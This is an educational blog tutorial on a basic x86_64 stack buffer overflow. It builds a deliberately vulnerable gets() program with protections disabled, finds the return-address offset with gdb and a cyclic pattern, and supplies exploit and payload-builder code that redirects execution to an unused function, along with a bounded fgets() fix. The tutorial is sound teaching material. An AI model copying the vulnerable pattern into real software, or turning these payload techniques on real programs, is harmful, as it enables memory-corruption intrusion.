Tutorial: Basic Buffer Overflow

September 1, 2015 | Views: 4380


// Hey guys, today, I will give you a brief introduction to buffer overflows on Linux x86_64 machines.
// So, let’s start with a basic example in C:
______________________________________________________________________________________________________________
// First some standard includes, you should know them...
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// gets() was removed from C11 and recent glibc headers no longer declare it,
// so we declare it ourselves. It still links (with a linker warning, which is the point).
char *gets(char *s);

// we create a vulnerable function
char *vulnFunction(int a, int b)
{
// the source says 125 bytes, but the compiler pads the frame so the saved
// registers stay aligned; in this build the buffer effectively takes 128 bytes.
// Do not trust that number blindly: the exact distance is measured with gdb below.
char Buffer1[125];

// now we get some input that could be greater than the buffer;
// gets() has no length limit at all, which is the whole bug
gets(Buffer1);

// and a pointer to a copy of the buffer will be returned
return strdup(Buffer1);
}

int main()
{
vulnFunction(0,1);
}

// This will never be called... by the program itself
void Unused()
{
printf("Hacked!\n");
exit(0);
}
______________________________________________________________________________________________________________
Compile using: gcc ./first_vuln.c -o first_vuln -fno-stack-protector -zexecstack
-fno-stack-protector disables the stack canary: a random value the compiler places between the buffer and the saved rbp/return address and checks before the function returns. With the canary on, overwriting it gets you a "stack smashing detected" abort instead of a jump to your address. This flag has nothing to do with ASLR.
-zexecstack marks the stack as executable. This tutorial never runs code on the stack (we return into Unused, which is already in the binary), so it is not needed here; it matters once you put shellcode into the buffer.
ASLR (address space layout randomization) is a kernel setting, and the binary's own code addresses are only randomized when it is built as a PIE. In 2015 gcc did not do that by default; on a current distro add -no-pie to the command above, otherwise the address of Unused changes on every run and the hardcoded value below will not work.

Q: So, what happens if we give an input greater than the buffer?
A: gets() keeps writing past the end of Buffer1 until it sees a newline or EOF. Everything above the buffer in the stack frame is overwritten in order: the padding, the saved rbp, and then the return address that the call from main left there. When vulnFunction returns, the CPU pops whatever we wrote into rip.
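The bounded version of that read, as an added example that is not part of the original tutorial: fgets() takes the buffer size, so it can never write past Buffer1. The caveat a practitioner should know is that fgets() leaves the unread rest of an overlong line in the stream, so the next read would see "AAAA..." as a fresh line; the helper below drains it. The input is a constructed in-memory stream (220 'A's and then a short second line), and the 125-byte buffer is the tutorial's.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>

/* Reads one line into buf (at most size-1 bytes plus NUL) and strips the
 * newline, like gets() did, but bounded. If the line did not fit, the rest
 * of it is discarded and *truncated is set so the caller can reject it.
 * Returns the number of bytes stored, or -1 on EOF with nothing read. */
long read_line_bounded(FILE *in, char *buf, size_t size, int *truncated)
{
    *truncated = 0;
    if (size == 0 || fgets(buf, (int)size, in) == NULL)
        return -1;

    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[--len] = '\0';
    } else {
        /* No newline: the buffer was too small or the stream ended without
         * one. Drain up to the newline so it cannot be misread as the next
         * line; any byte found here means the input was cut. */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            *truncated = 1;
    }
    return (long)len;
}

/* Constructed input: 220 'A's, newline, "second line", newline. Reads it
 * through a 125-byte buffer and reports what each read stored. */
int demo_bounded_read(long *first_len, int *first_trunc, long *second_len)
{
    char input[256];
    memset(input, 'A', 220);
    memcpy(input + 220, "\nsecond line\n", 14);   /* 13 chars + NUL */

    FILE *in = fmemopen(input, strlen(input), "r");
    if (in == NULL)
        return -1;

    char buf[125];
    int trunc;
    *first_len = read_line_bounded(in, buf, sizeof buf, &trunc);
    *first_trunc = trunc;
    *second_len = read_line_bounded(in, buf, sizeof buf, &trunc);
    fclose(in);
    return 0;
}

int main(void)
{
    long first, second;
    int trunc;
    if (demo_bounded_read(&first, &trunc, &second) != 0)
        return 1;
    printf("first line: stored %ld bytes, truncated=%d; second line: %ld bytes\n",
           first, trunc, second);
    return 0;
}
```

With the 125-byte buffer the first read stores 124 bytes and flags truncation; the second read still gets "second line" intact because the leftover 96 'A's were drained.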

Let's try it out:
perl -e 'print "A"x220' | ./first_vuln   # too much input...
Yeah, it crashes with a segmentation fault: 0x4141414141414141 is not a valid address to return to.
Now we start gdb to find some values:
gdb -q ./first_vuln
Disassemble the Unused function to get its start address
disas Unused

Now, you should search for something like this (the exact address depends on your build; use whatever your gdb prints):
Dump of assembler code for function Unused:
0x000000000040061c <+0>: push %rbp // this will be the new return address...
If the program later crashes inside printf instead of printing "Hacked!", the stack is misaligned because we entered Unused with a ret instead of a call; use the address of the instruction after push %rbp (Unused+1) instead, which keeps rsp 16-byte aligned.

The stack frame of vulnFunction is built like this (higher addresses first):
saved return address (popped into rip by ret)
saved rbp register (8 bytes)
Buffer1 (125 bytes, padded to 128)

Ok, we have our info. We need 128 bytes for the buffer and 8 for the saved rbp. After that, the return address begins, so it sits 136 bytes from the start of the buffer.
We need to overwrite the complete buffer and the saved rbp and append the new return address as an 8-byte little-endian value (x86_64 addresses are 8 bytes, lowest byte first)...
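Rather than trusting that the compiler rounds 125 up to 128, the distance to the saved return address can be measured. The following is an added example, not code from the original tutorial: it generates a cyclic pattern in which every 8-byte window is unique (the technique behind Metasploit's pattern_create/pattern_offset, reimplemented here) and maps a value back to its offset. On x86_64 the overwritten return address is non-canonical, so the crash happens on the ret instruction itself and the eight bytes that overwrote the return address are at the top of the stack: run the target under gdb with `run < pat.txt` and read them with `x/gx $rsp`. The pattern size and the offset 136 used in the demo are the tutorial's numbers.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PATTERN_MAX 20280   /* 26*26*10 triples of 3 bytes before it repeats */

/* Fills out[0..n) with "Aa0Aa1Aa2...Aa9Ab0..." and returns the length
 * written (capped at PATTERN_MAX so that no 8-byte window occurs twice). */
size_t pattern_create(char *out, size_t n)
{
    if (n > PATTERN_MAX)
        n = PATTERN_MAX;
    size_t i = 0;
    for (char u = 'A'; u <= 'Z' && i < n; u++)
        for (char l = 'a'; l <= 'z' && i < n; l++)
            for (char d = '0'; d <= '9' && i < n; d++) {
                char triple[3] = { u, l, d };
                for (int k = 0; k < 3 && i < n; k++)
                    out[i++] = triple[k];
            }
    return i;
}

/* Takes the 8-byte value gdb showed at $rsp (as the CPU read it, i.e. the
 * pattern bytes in little-endian order) and returns the offset in the
 * pattern where those bytes begin, or -1 if they are not from the pattern. */
long pattern_offset(uint64_t value)
{
    char pat[PATTERN_MAX];
    size_t n = pattern_create(pat, sizeof pat);
    unsigned char needle[8];
    for (int k = 0; k < 8; k++)
        needle[k] = (unsigned char)(value >> (8 * k));
    for (size_t i = 0; i + 8 <= n; i++)
        if (memcmp(pat + i, needle, 8) == 0)
            return (long)i;
    return -1;
}

/* Demo helper: the 8 pattern bytes at `off`, read the way a ret would. */
uint64_t value_at(size_t off)
{
    char pat[PATTERN_MAX];
    pattern_create(pat, sizeof pat);
    uint64_t v = 0;
    for (int k = 0; k < 8; k++)
        v |= (uint64_t)(unsigned char)pat[off + k] << (8 * k);
    return v;
}

int main(void)
{
    /* Step 1: ./pattern > pat.txt, then in gdb: run < pat.txt ; x/gx $rsp */
    char buf[200];
    size_t n = pattern_create(buf, sizeof buf);
    fwrite(buf, 1, n, stdout);

    /* Step 2: feed the printed value to pattern_offset(). Here it is
     * simulated with the bytes at offset 136, the tutorial's 128 + 8. */
    uint64_t seen = value_at(136);
    fprintf(stderr, "value 0x%016" PRIx64 " starts at offset %ld\n",
            seen, pattern_offset(seen));
    return 0;
}
```

The same trick works for the saved rbp: `info registers rbp` after the crash shows the eight bytes that landed just below the return address, so its offset comes out 8 smaller.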

#include <stdio.h>
#include <stdint.h>

int main(void)
{
// 34 x "1337" = 136 bytes: fills the 128-byte buffer and the 8-byte saved rbp
int i = 0;
for (i = 0; i < 34; i++)
printf("1337");

// the new return address: replace it with the value gdb printed for Unused.
// It must be written as raw bytes, not as text, and x86_64 is little-endian,
// so fwrite() of the integer emits the lowest byte first, as the CPU expects.
// (The original wrote only 4 bytes; that worked only because the upper 4 bytes
// of main's old return address were already zero in a non-PIE binary.)
uint64_t RIP = 0x000000000040061c;
fwrite(&RIP, 1, sizeof RIP, stdout);

return 0;
}

Simply compile the exploit and run it like this:
./first_exploit | ./first_vuln
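As an added example that goes a step beyond the exploit above (it is not the tutorial's own code), here is a payload builder that takes the measured offset and the target address as arguments, encodes the address byte by byte so it does not depend on the host's byte order, and checks for the one byte that breaks this particular delivery: gets() stops at a newline, so an address containing 0x0a would never be stored completely. The default offset and address are the tutorial's values; the argument handling is an assumption of this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Writes `offset` filler bytes followed by `ret` in little-endian order into
 * out. Returns the payload length, or 0 if it does not fit in cap. Sets *bad
 * when any address byte is '\n', since gets() would stop reading there and
 * leave the rest of the saved return address untouched. */
size_t build_payload(unsigned char *out, size_t cap, size_t offset,
                     uint64_t ret, int *bad)
{
    if (cap < offset + 8)
        return 0;
    memset(out, 'A', offset);
    *bad = 0;
    for (int k = 0; k < 8; k++) {
        unsigned char b = (unsigned char)(ret >> (8 * k));   /* lowest byte first */
        if (b == '\n')
            *bad = 1;
        out[offset + k] = b;
    }
    return offset + 8;
}

int main(int argc, char **argv)
{
    /* usage: ./payload [offset] [address] | ./first_vuln  (defaults: 136, 0x40061c) */
    size_t offset = argc > 1 ? strtoul(argv[1], NULL, 0) : 136;
    uint64_t ret = argc > 2 ? strtoull(argv[2], NULL, 0) : 0x40061cULL;
    unsigned char buf[4096];
    int bad;

    size_t n = build_payload(buf, sizeof buf, offset, ret, &bad);
    if (n == 0) {
        fputs("payload does not fit\n", stderr);
        return 1;
    }
    if (bad)
        fputs("warning: address contains 0x0a, gets() will cut it short\n", stderr);
    fwrite(buf, 1, n, stdout);
    return 0;
}
```

NUL bytes inside the address are fine for gets(), which is why a low address like 0x40061c can be delivered this way; they would not survive a strcpy()-based overflow, which is the usual reason to care about the bad-byte check.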


Have fun, and maybe you should read some more tutorials on buffer overflows.


Greets,

AnonOverflow

1 Comment
  1. In this example you are just redirecting execution flow to the hacked print function, right?
